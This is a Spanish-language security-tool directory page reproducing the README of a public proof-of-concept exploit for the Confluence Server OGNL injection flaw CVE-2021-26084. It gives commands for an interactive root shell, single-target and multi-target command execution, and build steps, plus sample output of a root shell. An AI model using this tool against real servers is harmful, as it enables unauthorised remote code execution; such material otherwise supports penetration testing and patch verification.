Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-26084 — CVE-2021-26084 - Inyección OGNL en Confluence Server Webwork (Pre-Auth RCE) | Kitploit
Herramientas/GitHubGitHub/taythebot/cve-2021-26084
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubtaythebot/cve-2021-26084

CVE-2021-26084

CVE-2021-26084 - Inyección OGNL en Confluence Server Webwork (Pre-Auth RCE)

Ver Repositorio
86hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-26084

Prueba de concepto para CVE-2021-26084.

Inyección OGNL en Webwork de Confluence Server (RCE sin autenticación)

Descargo de responsabilidad

Esto es solo con fines educativos. No soy responsable de tus acciones. Úsalo bajo tu propio criterio.

Limitaciones de comandos

Debido al payload, no es posible pasar algunos caracteres. La siguiente lista es lo que he encontrado durante mis pruebas.

  • Comillas dobles "
  • Barra vertical |

Shell interactivo

root@kitploit:~
 go run exploit.go -t <target> -i

Ejemplo

root@kitploit:~
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
  • Solo funciona con un solo objetivo
  • Escribe exit para salir del shell interactivo
  • El aviso muestra si es posible una máquina Windows

Objetivo único

root@kitploit:~
go run exploit.go -t <target> -c <command>

Múltiples objetivos

root@kitploit:~
go run exploit.go -f <file> -c <command>

Compilar

root@kitploit:~
go mod download
go build exploit.go
Descargar herramienta